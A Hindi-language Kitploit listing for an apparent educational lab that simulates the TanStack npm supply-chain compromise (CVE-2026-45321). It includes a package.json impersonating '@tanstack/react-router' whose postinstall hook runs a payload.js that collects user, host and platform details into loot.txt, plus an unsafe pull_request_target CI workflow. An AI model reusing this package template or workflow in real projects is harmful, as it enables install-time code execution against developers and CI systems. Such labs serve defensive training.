Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-45321-Tanstack — शैक्षिक प्रयोगशाला जो दुर्भावनापूर्ण पैकेज, पोस्टइंस्टॉल पेलोड निष्पादन और रक्षात्मक सुरक्षा प्रशिक्षण के लिए CI/CD दुरुपयोग परिदृश्यों के साथ npm आपूर्ति श्रृंखला हमले (CVE-2026-45321) का अनुकरण करती है। | Kitploit
उपकरण/GitHubGitHub/7whyex/cve-2026-45321-tanstack
भेद्यता विश्लेषणमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

शैक्षिक प्रयोगशाला जो दुर्भावनापूर्ण पैकेज, पोस्टइंस्टॉल पेलोड निष्पादन और रक्षात्मक सुरक्षा प्रशिक्षण के लिए CI/CD दुरुपयोग परिदृश्यों के साथ npm आपूर्ति श्रृंखला हमले (CVE-2026-45321) का अनुकरण करती है।

रिपॉजिटरी देखें
123 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सप्लाई चेन अटैक सिमुलेशन — CVE-2026-45321 (TanStack)

npm सप्लाई चेन अटैक, CI/CD दुरुपयोग और इंस्टॉल-टाइम कोड निष्पादन को समझने के लिए शैक्षिक प्रयोगशाला

अस्वीकरण

यह परियोजना केवल निम्नलिखित उद्देश्यों के लिए बनाई गई है:

  • साइबर सुरक्षा सीखना,
  • रक्षात्मक सुरक्षा अनुसंधान,
  • स्थानीय प्रयोगशाला सिमुलेशन,
  • सप्लाई चेन अटैक की अवधारणा को समझना।

इस परियोजना का उपयोग इसके लिए न करें:

  • वास्तविक सिस्टम पर हमला करना,
  • क्रेडेंशियल चुराना,
  • मैलवेयर तैनात करना,
  • अनधिकृत पहुँच,
  • या कोई अन्य अवैध गतिविधि।

विवरण

यह प्रयोगशाला निम्नलिखित घटनाओं की मूल अवधारणा का अनुकरण करती है:

  • CVE-2026-45321
  • TanStack npm सप्लाई चेन समझौता
  • GitHub Actions CI/CD दुरुपयोग
  • npm जीवनचक्र स्क्रिप्ट निष्पादन

सिमुलेशन स्थानीय और सुरक्षित रूप से बिना किसी वास्तविकता के किया जाता है:

  • वास्तविक क्रेडेंशियल चोरी,
  • टोकन एक्सफ़िलट्रेशन,
  • या तृतीय-पक्ष सेवाओं से समझौता।

प्रयोगशाला संरचना

lab/
├── fake-repo/          # लक्ष्य रिपॉजिटरी का अनुकरण
├── attacker-package/   # दुर्भावनापूर्ण पैकेज का अनुकरण
└── victim-project/     # पीड़ित का अनुकरण

सिमुलेशन कार्यप्रणाली

Attacker Package
        ↓
npm install
        ↓
postinstall स्क्रिप्ट चलती है
        ↓
payload.js स्वचालित रूप से निष्पादित होता है
        ↓
पीड़ित install-time निष्पादन से प्रभावित होता है

सीखी गई अवधारणाएँ

  • npm जीवनचक्र हुक्स
  • install-time मनमाना कोड निष्पादन
  • सप्लाई चेन अटैक
  • CI/CD विश्वास सीमा
  • दुर्भावनापूर्ण npm पैकेज
  • postinstall दुरुपयोग
  • निर्भरता समझौता

स्थापना

1. रिपॉजिटरी क्लोन करें

git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

अटैकर पैकेज सेटअप

2. अटैकर पैकेज फ़ोल्डर में जाएं

cd attacker-package

3. निर्भरता स्थापित करें

npm install

4. टारबॉल पैकेज बनाएं

npm pack

परिणाम:

tanstack-react-router-1.169.5.tgz

पीड़ित सिमुलेशन

5. पीड़ित प्रोजेक्ट में जाएं

cd ../victim-project

6. दुर्भावनापूर्ण पैकेज स्थापित करें

npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

आउटपुट

यदि सफल होता है तो निम्न दिखाई देगा:

=== MALICIOUS PAYLOAD EXECUTED ===

और फ़ाइल:

loot.txt

स्वचालित रूप से बन जाएगी।


उदाहरण payload.js

const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

उदाहरण package.json

{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD सिमुलेशन

इस परियोजना का उपयोग निम्नलिखित को समझने के लिए भी किया जा सकता है:

  • GitHub Actions
  • pull_request_target
  • CI/CD विशेषाधिकार सीमा
  • निर्भरता निष्पादन

उदाहरण वर्कफ़्लो:

name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321 से संबंध

प्रयोगशाला सिमुलेशनवास्तविक दुनिया
attacker-packageसमझौता किया गया TanStack पैकेज
payload.jsदुर्भावनापूर्ण इंस्टॉलर
postinstallजीवनचक्र हुक दुरुपयोग
victim-projectपीड़ित डेवलपर/CI
fake-repoGitHub Actions पाइपलाइन

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

केवल शैक्षिक उद्देश्य

यह प्रयोगशाला निम्नलिखित के बारे में जागरूकता बढ़ाने के लिए बनाई गई है:

  • सप्लाई चेन सुरक्षा,
  • निर्भरता सुरक्षा,
  • CI/CD सुरक्षा,
  • और रक्षात्मक सुरक्षा अनुसंधान।
टूल डाउनलोड करें